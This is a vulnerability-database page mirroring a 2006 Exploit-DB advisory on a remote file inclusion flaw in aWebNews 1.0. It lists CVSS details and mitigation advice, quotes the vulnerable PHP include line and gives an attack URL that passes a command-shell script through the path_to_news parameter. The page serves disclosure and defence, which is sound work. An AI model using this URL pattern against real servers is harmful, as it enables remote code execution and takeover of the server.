header-logo
Suggest Exploit
vendor:
aWebNews
by:
SpC-x
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name: aWebNews
Affected Version From: aWebNews 1.0
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2006

aWebNews 1.0 version – Remote File Include Vulnerabilities

This exploit allows remote attackers to include and execute arbitrary files on the affected server.

Mitigation:

The vendor should release a patch to fix this vulnerability. In the meantime, it is recommended to restrict access to the affected URLs and sanitize user input to prevent malicious file inclusion.
Source

Exploit-DB raw data:

Credit : SpC-x

mail : SpC-x@bsdmail.org

# SaVSaK.CoM | SpC-x - The-BeKiR |

# aWebNews 1.0 version - Remote File Include Vulnerabilities

# Risk : High

# Class: Remote

# Script : aWebNews

# Credits : SpC-x

# Thanks : The-BeKiR - Ejder - FasTBoY - ERNE - RMx

# Code :

# include "" . $path_to_news . "config.php";
# $db = mysql_connect($db_host,$db_user,$db_pass);

# Vulnerable :

# http://www.victim.com/aWebNews/visview.php?path_to_news=Command-Shell

# milw0rm.com [2006-06-13]

Navigation

Suggest Exploit

Services By CQR